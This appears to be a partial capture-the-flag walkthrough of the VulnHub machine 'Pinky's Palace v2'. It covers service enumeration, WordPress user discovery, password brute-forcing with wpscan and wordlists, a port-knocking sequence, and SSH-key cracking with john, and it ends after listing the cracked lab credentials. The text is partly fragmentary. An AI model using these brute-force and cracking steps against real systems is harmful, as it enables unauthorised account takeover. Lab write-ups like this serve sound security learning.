PINKY’S PALACE: V2 Walkthrough

Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.

Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.

Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts

Pinky's Palace: v2
This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

Enumeration

Let’s enumerate, 4655 7654 31337

Nothing from those ports.

More Enumeration…

whatweb http://192.168.103.172
Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.103.172], JQuery[1.12.4], MetaGenerator[WordPress 4.9.4], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Pinky's Blog – Just another WordPress site], UncommonHeaders[link], WordPress[4.9.4]

  1. Manual Exploration

Nothing critical

2. Nikto

  • /wp-links-opml.php
  • /wp-login.php

3. Gobuster

Some thing is given here 🤔

Let’s Enumerate Wordpress,

📌 Found a user: pinky1337

and No critical plugin or theme.


Finding Point Of Intrusion (POI)

let’s brute-force the username we got.

  1. cewl http://pinkydb -w pass.txt -> to generate the password
wpscan — url http://pinkydb -U pinky1337 -P pass.txt
  • No password found

2. Rockyou

wpscan — url http://pinkydb -U pinky1337 -P /usr/share/wordlists/rockyou.txt
  • Not found in few mins….

Let’s try port knocking,

7000 666 8890 worked!!!
Ports been opened

There is a login page on 7654,

Lets brute force….

john — rules — wordlist=pass.txt — stdout | tee wordlist.txt

Credentials: pinky:Passione

python ssh2john.py id_rsa > id_rsajohn

john — wordlist=/usr/share/wordlists/rockyou.txt id_rsajohn

Stefano:secretz101